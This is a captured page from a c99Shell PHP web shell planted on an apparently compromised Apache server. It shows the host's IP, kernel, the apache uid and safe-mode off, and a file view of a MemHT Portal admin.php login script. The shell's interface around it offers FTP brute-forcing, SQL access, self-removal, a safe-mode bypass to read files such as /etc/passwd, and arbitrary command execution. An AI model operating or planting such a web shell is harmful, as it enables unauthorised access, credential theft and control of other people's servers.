110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/alumni/ drwxrwxrwx Free 52.81 GB of 127.8 GB (41.32%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php



/********************************************************************************

    - MemHT Portal -

    

    Copyright (C) 2007-2008 by Miltenovik Manojlo

    http://www.memht.com

    

    This program is free software; you can redistribute it and/or modify

    it under the terms of the GNU General Public License as published by

    the Free Software Foundation; either version 2 of the License, or

    (at your opinion) any later version.

    

    This program is distributed in the hope that it will be useful,

    but WITHOUT ANY WARRANTY; without even the implied warranty of

    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

    GNU General Public License for more details.

    

    You should have received a copy of the GNU General Public License along

    with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2)

    or write to the Free Software Foundation, Inc., 51 Franklin Street,

    Fifth Floor, Boston, MA02110-1301, USA.

        

********************************************************************************/



//===========================================

//Script time execution

//===========================================

$mtime = microtime();

$mtime = explode(" ",$mtime);

$starttime = $mtime[1] + $mtime[0];



//===========================================

//Script compression

//===========================================

if (@extension_loaded('zlib')) {

    @ini_set('zlib.output_compression_level', 6);

    @ob_start('ob_gzhandler');

}



//===========================================

//Check if the site is installed

//===========================================

if (!file_exists("inc/inc_config.php")) {

    if (file_exists("install/install.php")) {

        header("Location: install/install.php");

    } else {

        die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Attention:</b> The configuration file is missing and a new installation cannot be started because the install file cannot be located</td></tr></table>");

    }

} else if (file_exists("install/install.php")) {

    die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Attention:</b> Delete the installation folder and files!</td></tr></table>");

}



//===========================================

//Database: Connect

//===========================================

require_once("inc/inc_config.php");

require_once("inc/inc_database.php");



$dblink = new database();

$dblink->connect();



//Database empty?

if ($dblink->get_num_noerr("SELECT nome FROM memht_config")==0) {

    die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Attention:</b> Cannot find database tables!</td></tr></table>");

}



//===========================================

//Timezone setting

//===========================================

$timezonerow = $dblink->get_row("SELECT timezone FROM memht_config");

$siteConfig['timezone'] = intval($timezonerow['timezone']);

$tzNOW = "DATE_ADD(NOW(),INTERVAL ".$siteConfig['timezone']." HOUR)";



//===========================================

//Includes

//===========================================

require_once("inc/inc_login.php");

require_once("inc/inc_functions.php");

require_once("inc/inc_bbcode.php");

require_once("inc/inc_readConfig.php");

require_once("inc/inc_getinfo.php");

require_once("inc/inc_ban.php");

//-------------------------------------------

require_once("inc/inc_banners.php");

require_once("admin/inc/inc_tpl.php");



//===========================================

//Language selection

//===========================================

if (file_exists("lang/".$siteConfig['language'].".php")) {

    include_once("lang/".$siteConfig['language'].".php");

} else {

    include_once("lang/".$siteConfig['default_language'].".php");

}

    

global $userid,$userInfo;



if (isAuth($userid,2)) {

    error_reporting(E_ALL);

    

    $admin = $userInfo['user'];

    $email = $userInfo['email'];

    

    if (isset($_GET['page'])) {

        $page = inCode($_GET['page']);

                

        if (checkCode($page)) {

            //Main Begin

            if (file_exists("admin/pages/$page/index.php")) {

                if (file_exists("admin/pages/$page/lang/".$siteConfig['language'].".php")) {

                    include_once("admin/pages/$page/lang/".$siteConfig['language'].".php");

                } else if (file_exists("admin/pages/$page/lang/".$siteConfig['default_language'].".php")) {

                    include_once("admin/pages/$page/lang/".$siteConfig['default_language'].".php");

                }

                if ($userInfo['rank']>2 OR $dblink->get_num("SELECT page FROM memht_privs WHERE userid=$userid AND page='$page'")>0) {

                    define("_LOAD_PAGE_",1);

                    include("admin/pages/$page/index.php");

                } else {

                    //Access denied......

                    require_once("admin/inc/inc_header.php");

                    admin_page_title("");

                    openTable();

                    echo "<div align='center' id='errorText'><b>"._ACCESSDENIED_."</b></div>";

                    closeTable();

                    require_once("admin/inc/inc_footer.php");

                }

                echo "</div>";

            } else {

                require_once("admin/inc/inc_header.php");

                    admin_page_title("");

                    openTable();

                    echo "<div align='center' id='errorText'><b>"._PAGE_NOEXIST_."</b></div>";

                    closeTable();

                require_once("admin/inc/inc_footer.php");

            }

            //Main End

        } else {

            require_once("admin/inc/inc_header.php");

                admin_page_title("");

                openTable();

                    echo "<div align='center' id='errorText'><b>"._SYNTAX_ERROR_."</b></div>";

                closeTable();

            require_once("admin/inc/inc_footer.php");

        }

    } else {

        require_once("admin/inc/inc_header.php");

            define("_LOAD_PAGE_",1);

            include_once("admin/inc/inc_newevents.php");

            include_once("admin/inc/inc_info.php");

        require_once("admin/inc/inc_footer.php");

    }

} else {

    error_reporting(0);

    

    echo "<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>\n";

    echo "<html xmlns='http://www.w3.org/1999/xhtml'>\n";

    echo "<head>\n";

    echo "<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />\n";

    echo "<title>".$siteConfig['site_name']." - Admin</title>\n";

    //Tooltips

    ?>

    <style type='text/css'>

        body {

            padding: 0;

            margin: 0;

        }

        body td { font-size:12px; color:#777; }

        .foot {

            padding-top: 4px;

            text-align:center;

            font-size:10px;

            color:#999;

        }

        .foot a,

        .foot a:visited { color: #999; }

        .foot a:hover { color:#900; }

        .adminbox {

            margin:0 auto;

            width:350px;

            padding:4px;

            background-color:#FFF;

            border:1px solid #DDD;

        }

        .adminbox_title {

            margin:0 auto;

            width:350px;

            padding:4px;

            font-size:14px;

            font-weight:bold;

            color:#AAA;

            background:url(images/admin/title.gif) repeat-x #FFF;

            text-align:center;

            border-left:1px solid #DDD;

            border-top:1px solid #DDD;

            border-right:1px solid #DDD;

        }

        .adminbox_error {

            margin:0 auto;

            width:350px;

            padding:10px 4px;

            background-color:#FFF;

            text-align:center;

            border:1px solid #DDD;

        }

        .intxt {

            border:1px solid #99CF0E;

            color:#777;

            font-size:16px;

        }

        .intxt:hover { border:1px solid #FFD110; }

        .button {

            background:url(images/admin/login.gif) no-repeat;

            width:58px;

            height:23px;

            border:0;

        }

        .button:hover {

            background:url(images/admin/login.gif) 0 -23px no-repeat;

            width:58px;

            height:23px;

            border:0;

        }

    </style>

    <?php

    echo "<style type='text/css'>\n";

    echo "body { font-size: 12px; }\n";

    echo "</style>\n";

    echo "</head>\n";

    echo "<body>\n";

    

    //

    ?>

    <link rel="stylesheet" href="admin/inc/inc_tpl.css" type='text/css'>

    <div class="tpl_admin_head_1"><img src="admin/images/tpl/tpl_head_logo.png" border="0" alt="MemHT Portal"></div>

    <div class="tpl_admin_head_2" style="margin-bottom:20px;"></div>

    <?php

    //



    if ($dblink->get_num("SELECT * FROM memht_login_flood WHERE ip='".$visitorInfo['ip']."' AND attempts>=5")==0) {

        echo "<form name='admin01' method='post' action='admin.php'>\n";

            echo "<div class='adminbox_title'>"._ADMINISTRATION_."</div>\n";

            echo "<div class='adminbox'>\n";

                echo "<table cellpadding='6' cellspacing='0' border='0' align='center'>\n";

                    echo "<tr>";

                        echo "<td rowspan='3' valign='top'><img src='images/admin/access.gif' alt='Access' style='margin-right:15px;'></td>";

                        echo "<td>"._USERNAME_."<br><input type='text' name='post_username' class='intxt'></td>";

                    echo "</tr>";

                    echo "<tr>";

                        echo "<td>"._PASSWORD_."<br><input type='password' name='post_password' class='intxt'></td>";

                    echo "</tr>";

                    echo "<tr>";

                        echo "<td><input type='submit' name='Submit' value='' class='button'></td>";

                    echo "</tr>";

                echo "</table>\n";

            echo "</div>";

            echo "<div style='text-align:center;'><a href='".$siteConfig['site_url']."' style='color:#AAA;'>"._BACKTOTHESITE_."</a></div>";

            echo "<input type='hidden' name='login' value='true'>";

            echo "</form>\n";

            @session_start();

            $_SESSION['redirect_url'] = "admin.php";

            $_SESSION['redirect_age'] = time();

        } else {

            echo "<div class='adminbox_title'>"._ADMINISTRATION_."</div>\n";

            echo "<div class='adminbox_error'><img src='images/admin/wait.gif' alt='Wait' style='margin-bottom:10px;'><br>"._YOUMUSTWAITTOLOGINAGAIN_."</div>\n";

        }    

    echo "</body>\n";

    echo "</html>\n";    

}

    

if ($siteConfig['usecronjobs']==0) {

    //===========================================

    //Maintenance

    //===========================================

    $maintenance = new Maintenance();

    $maintenance->All();

    

    //===========================================

    //Newsletter

    //===========================================

    sendNewsletter();

}



//===========================================

//Database: Disconnect

//===========================================

$dblink->disconnect();



?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: